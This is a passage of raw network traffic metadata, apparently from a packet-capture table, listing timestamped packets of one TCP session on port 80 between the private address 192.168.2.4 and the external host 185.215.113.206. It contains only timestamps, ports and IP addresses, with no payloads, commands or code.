Nov 7, 2024 04:12:21.110692024 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110702038 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110706091 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.110713959 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110717058 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.110723972 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110733986 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110739946 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.110761881 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.110773087 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110789061 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.110790014 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110802889 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110812902 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110816956 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.110821962 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.110831022 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110841036 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110846996 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.110853910 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110857964 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.110867023 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110873938 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.110879898 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110908985 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.110922098 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.110943079 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110953093 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110963106 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.110985041 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111013889 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111047029 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111166000 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111176014 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111185074 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111197948 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111208916 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111208916 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111218929 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111227036 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111236095 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111243963 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111248970 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111260891 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111270905 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111270905 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111294031 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111318111 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111335993 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111371994 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111393929 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111409903 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111419916 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111432076 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111435890 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111442089 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111448050 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111459970 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111469984 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111488104 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111495018 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111500978 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111516953 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111526966 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111537933 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111545086 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111547947 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111558914 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111569881 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111581087 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111582994 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111597061 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111605883 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111607075 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111620903 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111632109 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111634970 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111668110 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111669064 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111690044 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111690998 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111701012 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.111716986 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111731052 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.111746073 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150248051 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150269032 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150285006 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150295973 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150306940 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150311947 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150319099 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150330067 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150357962 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150414944 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150427103 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150438070 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150459051 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150470018 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150475025 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150480986 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150492907 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150504112 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150515079 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150516987 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150525093 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150526047 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150540113 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150548935 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150549889 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150559902 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150561094 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150571108 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150585890 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150597095 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150599957 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150610924 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150621891 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150630951 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150634050 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150643110 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150651932 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150660038 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150675058 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150801897 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150814056 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150831938 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150841951 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150844097 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150851011 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150855064 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.150871038 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.150911093 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.220810890 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221014023 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221045017 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221067905 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221096992 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221148968 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221190929 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221219063 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221230030 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221240044 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221261024 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221276045 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221286058 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221286058 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221297026 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221307993 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221317053 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221330881 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221343994 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221348047 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221354008 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221366882 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221369028 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221391916 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221393108 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221415997 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221432924 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221447945 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221456051 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221473932 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221473932 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221488953 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221504927 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221506119 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221504927 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221518993 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221528053 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221534967 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221539021 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221545935 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221564054 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221569061 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221589088 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221616030 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221632957 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221647978 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221657991 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221682072 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221681118 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221694946 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221704960 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221707106 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221719027 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221730947 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221743107 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221745968 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221777916 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221858025 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221869946 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221880913 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221889973 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221898079 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221908092 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221915960 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221920013 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221931934 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221942902 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221944094 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221960068 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221971035 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221976042 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.221982956 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.221992016 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222007036 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222018003 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222033978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222039938 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222064018 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222065926 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222090960 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222095966 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222103119 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222114086 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222124100 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222136021 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222157001 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222206116 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222244978 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222307920 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222318888 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222328901 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222341061 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222352028 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222353935 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222373009 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222394943 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222398996 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222424030 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222434044 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222445965 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222451925 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222461939 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222465038 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222480059 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222489119 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222490072 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222498894 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222503901 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222516060 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222520113 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222537041 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222554922 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222563982 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222567081 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222582102 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222590923 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222593069 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222600937 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222605944 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222621918 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222629070 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222650051 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222651005 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222661018 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222671032 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222672939 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222682953 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222692013 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222695112 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222706079 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222721100 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222743034 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222744942 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222783089 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222791910 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222803116 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222825050 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222834110 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222837925 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222848892 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222857952 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222891092 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222894907 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222906113 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222915888 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222924948 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222927094 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222939014 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222953081 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222985029 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.222985983 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.222996950 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223028898 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223033905 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223040104 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223051071 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223061085 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223069906 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223073959 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223090887 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223100901 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223109961 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223119974 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223125935 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223130941 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223141909 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223143101 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223155022 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223166943 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223181963 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223184109 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223192930 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223208904 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223233938 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223274946 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223287106 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223297119 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223308086 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223325968 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223330975 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223335028 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223342896 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223354101 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223362923 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223366022 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223380089 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223387003 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223407030 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223417044 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223428011 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223431110 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223448992 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223454952 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223462105 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223474026 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223474979 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223480940 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223499060 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223514080 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223659039 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223676920 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223686934 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223717928 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223737955 CET	49755	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:21.223757029 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223767042 CET	80	49755	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:21.223777056 CET	80	49755	185.215.113.206	192.168.2.4
